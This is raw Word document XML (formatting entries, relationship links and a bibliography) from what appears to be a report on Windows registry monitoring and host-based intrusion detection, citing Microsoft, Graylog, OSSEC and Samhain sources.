      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1570573545">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1585650530">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1592352044">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1599410975">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1605653894">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1611431359">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1613242258">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1634172400">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1683818288">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1685159653">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1692993816">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1724327774">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1734232069">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1778478421">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1802459201">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1818374432">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1825049461">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1834493976">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1835879604">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1843231990">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1847744884">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1886595865">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1946232560">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2002853469">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2008555678">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2014721228">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2031905726">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2057731084">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2060206025">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2066947259">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2107117614">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2120296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gif"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.gif"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.graylog.org/en/2.2/pages/collector_sidecar.html"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yperlink" Target="https://msdn.microsoft.com/en-us/library/windows/desktop/ms724892(v=vs.85).aspx" TargetMode="External"/><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s://technet.microsoft.com/en-us/library/cc750583.aspx" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.graylog.org/en/2.2/pages/architecture.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/help/256986/windows-registry-information-for-advanced-users" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.graylog.org/en/2.2/pages/streams.html" TargetMode="External"/><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hyperlink" Target="file:///\\CurrentVersion\\Run" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc750583.aspx" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/help/256986/windows-registry-information-for-advanced-users" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.graylog.org/en/2.2/pages/architecture.html" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.PNG"/><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footer" Target="footer1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc750583.aspx" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.graylog.org/en/2.2/pages/collector_sidecar.html" TargetMode="External"/><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s://technet.microsoft.com/en-us/library/cc750583.aspx" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/881d8b23-d274-4313-a666-88f80c2cfd92.aspx" TargetMode="External"/><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2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technet.microsoft.com/en-us/library/cc750583.aspx" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.graylog.org/en/2.2/pages/collector_sidecar.html" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.graylog.org/en/2.2/pages/dashboards.html" TargetMode="External"/><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image" Target="media/image36.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:username@yourMachine.com"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hyperlink" Target="https://github.com/ytisf/theZoo"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4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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Registry</b:Tag>
    <b:SourceType>ArticleInAPeriodical</b:SourceType>
    <b:Guid>{04D32E5D-BED6-4F77-A1E3-ADFAC07963E3}</b:Guid>
    <b:LCID>en-US</b:LCID>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Grimes</b:Last>
            <b:First>Roger</b:First>
            <b:Middle>A.</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Infected with malware? Check your Windows registry</b:Title>
    <b:PeriodicalTitle>InfoWorld</b:PeriodicalTitle>
    <b:Year>2015</b:Year>
    <b:Month>March</b:Month>
    <b:Day>10</b:Day>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Service</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{A37CC9DA-6ACE-4978-B437-B93686390BF5}</b:Guid>
    <b:Title>Introduction to Windows Service Applications</b:Title>
    <b:InternetSiteTitle>Microsoft Developter Network</b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/d56de412(v=vs.110).aspx</b:URL>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Developers</b:Last>
            <b:First>Microsoft</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Fre08</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{E76BF129-C002-4972-A38B-28839E8D81A5}</b:Guid>
    <b:Title>OSSEC Open Source Security</b:Title>
    <b:Year>Fall 2008</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Freemon</b:Last>
            <b:First>Mike</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Publisher>CSC570G Linux Implementation/Administration Practicum</b:Publisher>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Nel14</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{E8C770FC-CBBA-4791-A578-350D71EC481E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nel</b:Last>
            <b:First>Martinus</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Khiabani</b:Last>
            <b:First>Hamed</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>SAMHAIN: Host Based Intrusion Detection via File Integrity Monitoring</b:Title>
    <b:Year>2014</b:Year>
    <b:Publisher>SANS Institute</b:Publisher>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic1</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{BAE88519-F338-4C79-A5B1-3662003D5389}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Microsoft</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Structure of the Registry</b:Title>
    <b:InternetSiteTitle>Windows Dev Center</b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/windows/desktop/ms724946(v=vs.85).aspx</b:URL>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MSD</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0036B71D-A96A-4CD5-B20D-A88475F6C57A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>MSDN</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Remote Procedure Call</b:Title>
    <b:InternetSiteTitle>Windows Dev Center </b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/windows/desktop/aa378651(v=vs.85).aspx</b:URL>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MSD1</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{394A47CC-1BAC-452D-9CDA-EC4FD0CBDB61}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Microsoft</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>How RPC Works</b:Title>
    <b:InternetSiteTitle>Windows Dev Center </b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/windows/desktop/aa373935(v=vs.85).aspx</b:URL>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic03</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{527CD71A-D538-48EB-82A7-6F8436B6CE6A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Microsoft</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>How Access Tokens Work</b:Title>
    <b:InternetSiteTitle>Microsoft Technet </b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:Year>2003</b:Year>
    <b:Month>March</b:Month>
    <b:Day>28</b:Day>
    <b:URL>https://technet.microsoft.com/en-us/library/cc783557(v=ws.10).aspx</b:URL>
    <b:RefOrder>15</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Tec05</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{AFABC29E-2DB6-40CE-A653-DA664F842D00}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>TechNet</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Understanding Windows Services Architecture</b:Title>
    <b:InternetSiteTitle>Microsoft Technet </b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:Year>2005</b:Year>
    <b:Month>May</b:Month>
    <b:Day>23</b:Day>
    <b:URL>https://technet.microsoft.com/en-us/library/881d8b23-d274-4313-a666-88f80c2cfd92.aspx</b:URL>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{6FCD379B-09FF-4F02-9F7D-361581775306}</b:Guid>
    <b:Title>About Services</b:Title>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>MSDN</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:InternetSiteTitle>Microsoft Developer Network </b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/windows/desktop/ms681921(v=vs.85).aspx</b:URL>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic97</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{B98F9A95-B9CD-482D-ADA0-6F1D540B69D0}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Russinovich</b:Last>
            <b:First>Mark</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Inside the Registry</b:Title>
    <b:InternetSiteTitle>Microsoft Technet</b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:Year>1997</b:Year>
    <b:Month>April</b:Month>
    <b:URL>https://technet.microsoft.com/en-us/library/cc750583.aspx</b:URL>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic2</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{D77777F7-71CC-41DC-A86E-51D847F549DB}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Microsoft</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Windows Kernel-Mode Configuration Manager</b:Title>
    <b:InternetSiteTitle>Hardware Dev Center</b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/windows/hardware/ff565712(v=vs.85).aspx</b:URL>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic14</b:Tag>
